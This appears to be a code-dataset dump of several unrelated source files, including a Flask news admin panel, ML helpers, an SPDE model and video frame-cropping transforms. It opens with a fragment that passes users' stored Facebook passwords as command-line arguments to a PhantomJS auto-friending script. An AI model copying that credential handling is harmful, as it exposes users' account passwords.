script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'facebookfriender.js')
try:
subprocess.call([phantomjs, script, friend, request.user.get_profile().facebook_email, request.user.get_profile().facebook_pass])
except:
return False
return True
def extract(request):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'useridextractor.js')
print "sexy"
out = subprocess.check_output([phantomjs, script, request.POST['email'], request.POST['password']])
print out
return "user id goes here"
| 1.96875 | 2 |
fancylit/modeling/yellowbrick_funcs.py | rubyruins/fancylit | 0 | 4966 | <gh_stars>0
import random
import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px
def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
"""
Purpose:
Prep data for modeling
Args:
df - Pandas dataframe
Returns:
test_features - test set features
train_features - train set feautres
test_target - test set target
train_target - train set target
"""
# Specify the target classes
target_string = st.selectbox("Select Target Column", df.columns)
target = np.array(df[target_string])
# Select Features you want
feature_cols = st.multiselect("Select Modeling Features", df.columns)
# Get all features
features = df[feature_cols]
featurestmp = np.array(features)
feats = []
# find all bad rows
for index, featarr in enumerate(featurestmp):
try:
featarr = featarr.astype(float)
feats.append(featarr)
except Exception as error:
st.error(error)
st.error(featarr)
st.stop()
featuresarr = np.array(feats)
# Split Data
randInt = random.randint(1, 200)
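    # NOTE: sklearn's train_test_split returns the train split first; with
    # test_size=0.75 the arrays bound to the "test" names below hold 25% of
    # the rows and the "train" arrays hold the remaining 75%.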
(
test_features,
train_features,
test_target,
train_target,
) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)
return (
test_features,
train_features,
test_target,
train_target,
)
def show_classification_report(
df: pd.DataFrame,
) -> None:
"""
Purpose:
Renders a classification_report
Args:
df - Pandas dataframe
Returns:
N/A
"""
# Prep data for model training
(
test_features,
train_features,
test_target,
train_target,
) = data_prep(df)
if st.button("Train Model"):
st.header("Classification Report")
st.markdown(
"The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
)
# Instantiate the visualizer
visualizer = classification_report(
GaussianNB(),
train_features,
train_target,
test_features,
test_target,
support=True,
)
# Get the viz
fig = visualizer.fig
ax = visualizer.show()
fig.axes.append(ax)
# show the viz
st.write(fig)
# TODO download model, Download report
# TODO live predictions
def feature_correlation(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a feature correlation graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
target_string = st.selectbox("Select Target Column", df.columns,
key="selectbox-feature-correlation")
residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
feature_cols = st.multiselect("Select Modeling Features", residual_cols,
key="multiselect-feature-correlation",
default=residual_cols[:5])
if str(df[target_string].dtype) == "object":
method = 'mutual_info-classification'
else:
type_problem = st.selectbox("Select the type of problem",
['classification', 'regression'])
if type_problem == 'classification':
method = st.selectbox("Select the correlation method",
['mutual_info-classification', 'pearson'])
else:
method = st.selectbox("Select the correlation method",
['mutual_info-regression', 'pearson'])
try:
viz = FeatureCorrelation(method=method,
feature_names=feature_cols,
sort=True)
viz.fit(df[feature_cols], df[target_string])
fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
st.plotly_chart(fig)
    except Exception:
        st.warning("Verify the type of problem that you selected")
def class_balance(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a class balance graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1)
visualizer = ClassBalance(labels = df[classes].unique())
visualizer.fit(df[classes])
st_yellowbrick(visualizer) | 3.453125 | 3 |
info/modules/admin/views.py | moonbria/test1 | 0 | 4967 | <reponame>moonbria/test1
from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu
@admin_blu.route("/login", methods=["GET", "POST"])
def admin_login():
if request.method == "GET":
        # fetch the values stored in the session
user_id = session.get("user_id", None)
is_admin = session.get("is_admin", False)
if user_id and is_admin:
return redirect(url_for("admin_index"))
return render_template("admin/login.html")
    # get the login parameters
username = request.form.get("username")
password = request.form.get("password")
if not all([username, password]):
return render_template("admin/login.html", errmsg="参数错误")
try:
user = User.query.filter(User.mobile == username).first()
except Exception as e:
current_app.logger.error(e)
return render_template("admin/login.html", errmsg="数据错误")
if not user:
return render_template("admin/login.html", errmsg="用户名错误")
if not user.check_password(password):
return render_template("admin/login.html", errmsg="密码错误")
if not user.is_admin:
return render_template("admin/login.html", errmsg="用户不是管理员")
session["user_id"] = user.id
session["nick_name"] = user.nick_name
session["mobile"] = user.mobile
session["is_admin"] = True
    # redirect to the admin home page
return redirect(url_for("admin.admin_index"))
@admin_blu.route("/index")
@user_login_data
def admin_index():
user = g.user
return render_template("admin/index.html", user=user.to_dict())
@admin_blu.before_request
def before_request():
    # only check requests that are not for the login page
if not request.url.endswith(url_for("admin.admin_login")):
user_id = session.get("user_id")
is_admin = session.get("is_admin", False)
if not user_id or not is_admin:
            # if no user is logged in or the user is not an admin, redirect to the site home page
return redirect("/")
@admin_blu.route("/user_count")
def user_count():
    # query the total number of users
total_count = 0
try:
total_count = User.query.filter(User.is_admin == False).count()
except Exception as e:
current_app.logger.error(e)
    # query the number of new users this month
mon_count = 0
try:
now = time.localtime()
mon_begin = "%d-%02d-01" % (now.tm_year, now.tm_mon)
mon_begin_date = datetime.strptime(mon_begin, "%Y-%m-%d")
mon_count = User.query.filter(User.is_admin==False,
User.create_time > mon_begin_date).count()
except Exception as e:
current_app.logger.error(e)
day_count = 0
try:
day_begin = "%d-%02d-%02d" % (now.tm_year, now.tm_mon, now.tm_mday)
day_begin_date = datetime.strptime(day_begin, "%Y-%m-%d")
day_count = User.query.filter(User.is_admin==False,
User.create_time >= day_begin_date).count()
except Exception as e:
current_app.logger.error(e)
    # query data for the activity chart
    # get today's date at 00:00:00
now_date = datetime.strptime(datetime.now().strftime("%Y-%m-%d"), "%Y-%m-%d")
print(now_date)
    # define empty lists to hold the data
active_date = list()
active_count = list()
    # append the data for each day, then reverse
for i in range(0, 31):
begin_date = now_date - timedelta(days=i)
end_date = now_date - timedelta(days=(i - 1))
active_date.append(begin_date.strftime("%Y-%m-%d"))
count = 0
try:
count = User.query.filter(User.is_admin == False,
User.last_login >= begin_date,
User.last_login < end_date).count()
print(count)
except Exception as e:
current_app.logger.error(e)
active_count.append(count)
active_date.reverse()
active_count.reverse()
data = {"total_count": total_count, "mon_count": mon_count, "day_count": day_count,
"active_date": active_date, "active_count": active_count}
return render_template("admin/user_count.html", data=data)
@admin_blu.route("/user_list")
def user_list():
"""获取用户列表"""
    # get parameters
page = request.args.get("p", 1)
try:
print(page)
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
    # set default values
users = []
current_page = 1
total_page = 1
    # query the data
try:
paginate = User.query.filter(User.is_admin == False)\
.order_by(User.last_login.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
users = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
    # convert the list of models into a list of dicts
users_list = []
for user in users:
users_list.append(user.to_admin_dict())
context = {
"total_page": total_page,
"current_page": current_page,
"users": users_list
}
return render_template("admin/user_list.html", data=context)
@admin_blu.route("/news_review")
def news_review():
"""返回待审核新闻列表"""
page = request.args.get("p", 1)
keywords = request.args.get("keywords", "")
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = [News.status != 0]
        # if keywords were supplied
if keywords:
            # add the keyword filter
filters.append(News.title.contains(keywords))
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
        current_app.logger.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_review_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"news_list": news_dict_list
}
return render_template("admin/news_review.html", data=data)
@admin_blu.route("/news_review_detail", methods=["GET", "POST"])
def news_review_detail():
"""新闻审核"""
    # get the news id
if request.method == "GET":
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
        # query the news item by id
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
        # return the data
data = {
"news": news.to_dict()
}
return render_template("admin/news_review_detail.html", data=data)
    # perform the review action
    # 1. get parameters
news_id = request.json.get("news_id")
action = request.json.get("action")
    # 2. validate parameters
if not all([news_id, action]):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
if action not in ("accept", "reject"):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news = None
try:
        # 3. query the news item
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未查询到数据")
if action == "accept":
news.status = 0
else:
        # rejected: a reason must be provided
reason = request.json.get("reason")
if not reason:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news.reason = reason
news.status = -1
    # commit to the database
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="操作成功")
@admin_blu.route("/news_edit", methods=["GET", "POST"])
def news_edit():
"""返回新闻列表"""
page = request.args.get("p", "1")
print(page)
a = re.match(r"^\d*", page)
b = re.findall(r"""keywords=(\w*)""", page)
print(b)
page = a.group()
if b != []:
b = b[0]
keywords = b
else:
keywords = None
b = ""
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = list()
        # if keywords were supplied
if keywords:
            # add the keyword filter
filters.append(News.title.contains(keywords))
        # query
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_basic_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"new_list": news_dict_list,
"last_input": b
}
if request.method == "GET":
return render_template("admin/news_edit.html", data=data)
# return jsonify(errno=RET.OK, errmsg="OK")
return render_template("admin/news_edit.html", data=data)
@admin_blu.route("/news_edit_detail", methods=["GET", "POST"])
def news_edit_detail():
"""新闻编辑详情"""
if request.method == "GET":
        # get parameters
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
        # query the news item
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
categories = Category.query.all()
categories_li = []
for category in categories:
c_dict = category.to_dict()
c_dict["is_selected"] = False
            if category.id == news.category_id:
c_dict["is_selected"] = True
categories_li.append(c_dict)
        # remove the "latest" category
categories_li.pop(0)
data = {
"news": news.to_dict(),
"categories": categories_li
}
return render_template("admin/news_edit_detail.html", data=data)
news_id = request.form.get("news_id")
title = request.form.get("title")
digest= request.form.get("digest")
content = request.form.get("content")
index_image = request.form.get("index-image")
categery_id = request.form.get("category_id")
    # 1.1 check that the required fields are present
if not all([title, digest, content, categery_id]):
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
print(title, digest, content, categery_id)
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未找到新闻数据")
    # 1.2 try to read the image
if index_image:
try:
index_image = index_image.read()
except Exception as e:
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
    # 2. upload the cover image to Qiniu
try:
key = storage(index_image)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.THIRDERR, errmsg="上传图片错误")
news.index_image_url = constants.QINIU_DOMIN_PREFIX + key
    # 3. set the related fields
news.title = title
news.digest = digest
news.content = content
news.category_id = categery_id
    # 4. save to the database
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
    # 5. return the result
return jsonify(errno=RET.OK, errmsg="编辑成功")
@admin_blu.route("/news_category")
def get_news_category():
    # get all categories
categories = Category.query.all()
    # list to hold the category data
categories_dicts = []
for category in categories:
        # get the dict
cate_dict = category.to_dict()
        # append to the result
categories_dicts.append(cate_dict)
categories_dicts.pop(0)
    # return the content
data = {
"categories": categories_dicts
}
return render_template("admin/news_type.html", data=data)
@admin_blu.route("/add_category", methods=["POST"])
def add_category():
"""修改或者添加分类"""
category_id = request.json.get("id")
category_name = request.json.get("name")
print(category_name)
if not category_name:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
    # check whether a category id was given
if category_id:
try:
category = Category.query.get(category_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="查询数据失败")
if not category:
return jsonify(errno=RET.NODATA, errmsg="未查询到分类信息")
category.name = category_name
return jsonify(errno=RET.OK, errmsg="保存数据成功")
else:
        # no category id was given, so add a new category
try:
new_category = Category()
new_category.id = category_id
new_category.name = category_name
db.session.add(new_category)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="保存数据成功")
| 2.078125 | 2 |
src/predict_model.py | Swati17293/outlet-prediction | 1 | 4968 | #Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
def load_model():
print('\nLoading model...')
# load json and create model
json_file = open('models/MODEL.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
gate_model = model_from_json(loaded_model_json)
# load weights into new model
gate_model.load_weights('models/MODEL.h5', by_name=True)
return gate_model
train_ans, anslist = [], []
def ans_vec():
anslist = []
dataset = ['Train']
for data in dataset:
f = open('data/raw/' + data + '.csv')
lines = csv.reader(f)
for line in lines:
source_uri = line[4]
anslist.append(source_uri)
f.close()
return anslist
def generate_save_ans():
dic = 3
anslist = ans_vec()
gate_model = load_model()
test_title_feature = np.load('data/vectorized/Test_title.npy')
test_summary_feature = np.load('data/vectorized/Test_summary.npy')
tokenizer_a = text.Tokenizer(num_words=dic+1)
tokenizer_a.fit_on_texts(anslist)
dic_a = tokenizer_a.word_index
ind_a ={value:key for key, value in dic_a.items()}
num_test = len(open('data/raw/Test.csv', 'r').readlines())
ans = gate_model.predict([ test_title_feature, test_summary_feature])
fp = open('reports/Test.ans', 'w')
for h in range(num_test):
i = h
if np.argmax(ans[i][0],axis=0) == 0:
fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes"
else:
for j in range(dic):
an = np.argmax(ans[i][j],axis=0)
if j != dic-1:
anext = np.argmax(ans[i][j+1],axis=0)
if an != 0 and anext != 0: #Words before and after
if an == anext:
fp.write('') #Delete duplicate words
else:
fp.write(ind_a[an] + ' ')
elif an != 0 and anext == 0:
fp.write(ind_a[an])
elif an == 0 and anext != 0:
fp.write(ind_a[anext])
else:
fp.write('')
else:
if an != 0:
fp.write(ind_a[an] + '\n')
else:
fp.write('\n')
fp.close()
def main():
load_model()
print('\n\nGenerating answers...')
if os.path.exists('reports') == False:
os.mkdir('reports')
if os.path.isfile('reports/Test.ans') == False:
generate_save_ans()
print('\nAnswer generation complete...\n\n')
if __name__ == "__main__":
main() | 2.84375 | 3 |
tools/client.py | Alisa1114/yolov4-pytorch-1 | 0 | 4969 | # -*- coding: UTF-8 -*-
from socket import *
def client():
    # lab computer
# serverip='192.168.3.11'
# serverport=8887
    # testing on the local machine
serverip='127.0.0.1'
serverport=8888
client=socket(AF_INET,SOCK_STREAM)
client.connect((serverip,serverport))
address_file = open('tools/address.txt', 'r')
address = address_file.read()
client.send(address.encode())
print(client.recv(1024).decode())
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = "國立台北大學世界第一:)" | 3.03125 | 3 |
dapy/models/kuramoto_sivashinsky.py | hassaniqbal209/data-assimilation | 11 | 4970 | """Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronomica, 4 (1977) pp. 1177–1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
class FourierLaminarFlameModel(AbstractDiagonalGaussianModel):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its the Fourier coefficients rather
than values of the state field at the spatial mesh points.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
The governing stochastic partial differential equation (SPDE) is
dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW
where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time
coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the
degree of damping in the dynamics, `W(s, t)` a space-time white noise process,
`κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the
spatial coordinate.
Using a spectral spatial discretisation, this corresponds to a non-linear system of
stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ
dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ
where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of
the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i`
the imaginary unit.
A Fourier-domain exponential time-differencing integrator with 4th order Runge--
Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic
component of the SDE dynamics and an Euler-Maruyama discretisation used for the
Wiener process increment.
The smoothing kernel Fourier coefficients are assumed to be
κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S)
where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling
the length scale.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations. Acta Astronomica, 4 (1977)
pp. 1177–1206.
3. Kassam, Aly-Khan and Trefethen, <NAME>.
Fourth-order time-stepping for stiff PDEs.
SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233.
4. Cox, <NAME>. and Matthews, <NAME>.
Exponential time differencing for stiff systems.
Journal of Computational Physics 176.2 (2002): 430-455.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
**kwargs
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
assert dim_state % 2 == 0, "State dimension `dim_state` must be even"
self.time_step = time_step
self.observation_space_indices = observation_space_indices
self.observation_function = observation_function
spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent
spatial_freqs_sq = spatial_freqs ** 2
spatial_freqs[dim_state // 2] = 0
state_noise_kernel = (
(time_step) ** 0.5
* state_noise_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
state_noise_std = rfft_coeff_to_real_array(
state_noise_kernel + 1j * state_noise_kernel, False
)
initial_state_kernel = (
initial_state_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
initial_state_std = rfft_coeff_to_real_array(
initial_state_kernel + 1j * initial_state_kernel, False
)
def linear_operator(freqs, freqs_sq):
return freqs_sq - freqs_sq ** 2 - damping_coeff
def nonlinear_operator(v, freqs, freqs_sq):
return (
-0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho")
)
self.integrator = FourierETDRK4Integrator(
linear_operator=linear_operator,
nonlinear_operator=nonlinear_operator,
num_mesh_point=dim_state,
domain_size=domain_extent,
time_step=time_step,
num_roots_of_unity=num_roots_of_unity_etdrk4_integrator,
)
if observation_function is None:
dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0]
else:
dim_observation = observation_function(
np.zeros(dim_state)[observation_space_indices], 0
).shape[0]
super().__init__(
dim_state=dim_state,
dim_observation=dim_observation,
initial_state_std=initial_state_std,
initial_state_mean=np.zeros(dim_state),
state_noise_std=state_noise_std,
observation_noise_std=observation_noise_std,
**kwargs
)
def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray:
return rfft_coeff_to_real_array(
self.integrator.step(real_array_to_rfft_coeff(states))
)
def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray:
subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[
..., self.observation_space_indices
]
if self.observation_function is None:
return subsampled_states
else:
return self.observation_function(subsampled_states, t)
class SpatialLaminarFlameModel(
SpatiallyExtendedModelMixIn,
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
FourierLaminarFlameModel,
):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its values at the spatial mesh points
rather than the corresponding Fourier coefficients. For more details see the
docstring of `FourierLaminarFlameModel`.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
super().__init__(
dim_state=dim_state,
observation_space_indices=observation_space_indices,
observation_function=observation_function,
time_step=time_step,
domain_extent=domain_extent,
damping_coeff=damping_coeff,
observation_noise_std=observation_noise_std,
initial_state_amplitude=initial_state_amplitude,
state_noise_amplitude=state_noise_amplitude,
state_noise_length_scale=state_noise_length_scale,
num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator,
mesh_shape=(dim_state,),
domain_extents=(domain_extent,),
domain_is_periodic=True,
observation_node_indices=observation_space_indices,
)
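

if __name__ == "__main__":
    # Minimal usage sketch (assumed entry point, not part of the original module):
    # construct the spatial-domain model on a small mesh. Simulation and
    # data-assimilation routines are provided by the base classes and are not
    # exercised here.
    model = SpatialLaminarFlameModel(dim_state=128, time_step=0.25)
    print("constructed:", type(model).__name__)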
| 2.015625 | 2 |
setup.py | Lif3line/myo-helper | 0 | 4971 | <filename>setup.py
"""Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
      description='Utility functions for working with Myo Armband data',
author='Lif3line',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 1.296875 | 1 |
demos/restful-users/index.py | karldoenitz/karlooper | 161 | 4972 | # -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
class UsersHandler(Request):
def get(self):
return self.render("/user-page.html")
class UserInfoHandler(Request):
def post(self):
print(self.get_http_request_message())
size = self.get_parameter("user_size", 0)
size = int(size)
user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
result = {
"status": 0,
"message": "OK",
"data": user_list
}
return self.response_as_json(result)
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
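
# Example request (assumed; run this module first so the server listens on
# http://127.0.0.1:8080):
#
#     curl -d "user_size=3" http://127.0.0.1:8080/user-info
#
# which returns a JSON payload containing three generated users.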
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| 2.59375 | 3 |
temporal_transforms.py | LijiangLong/3D-ResNets-PyTorch | 0 | 4973 | import random
import math
class LoopPadding(object):
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalBeginCrop(object):
"""Temporally crop the given frame indices at a beginning.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices[:self.size]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCrop(object):
"""Temporally crop the given frame indices at a center.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
center_index = len(frame_indices) // 2
begin_index = max(0, center_index - (self.size // 2))
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
